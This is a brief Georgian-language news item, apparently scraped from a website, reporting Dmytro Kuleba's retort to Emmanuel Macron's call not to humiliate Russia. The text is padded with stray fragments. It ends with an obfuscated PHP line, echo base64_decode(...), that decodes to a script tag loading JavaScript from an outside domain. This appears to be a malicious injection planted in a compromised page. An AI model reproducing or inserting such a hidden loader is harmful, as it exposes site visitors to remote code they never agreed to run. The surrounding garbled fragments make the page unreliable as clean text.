celsiusi
ავერსი საქკაბელი
რუსეთის დამცირების თავიდან აცილების მოწოდებებს შეუძლია მხოლოდ საფრანგეთის დამცირება, – ასე გამოეხმაურა უკრაინის საგარეო საქმეთა მინისტრი დმიტრო კულება საფრანგეთის პრეზიდენტის, ემანუელ მაკრონის განცხადებას იმის შესახებ, რომ რუსეთის ღიად დამცირება მხოლოდ დაკეტავს მომავალ დიპლომატიურ გზებს.
 
„რუსეთის დამცირების თავიდან აცილების მოწოდებებს შეუძლია მხოლოდ საფრანგეთის დამცირება და ნებისმიერი სხვა ქვეყნის, რომელიც ამის მოწოდებით გამოვა, რადგან რუსეთი თავად ამცირებს საკუთარ თავს. ჩვენ, ყველა უმჯობესია, ვფოკუსირდეთ იმაზე, თუ როგორ მივუჩინოთ რუსეთს თავისი ადგილი. ეს დაამყარებს მშვიდობას და გადაარჩენს ადამიანების სიცოცხლეს“, – წერს დმიტრო კულება სოციალურ ქსელ „ტვიტერში.
 
ცნობისთვის, როგორც ემანუელ მაკრონმა ფრანგულ რეგიონულ მედიასთან ინტერვიუში აღნიშნა „ჩვენ არ უნდა დავამციროთ რუსეთი."
754
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");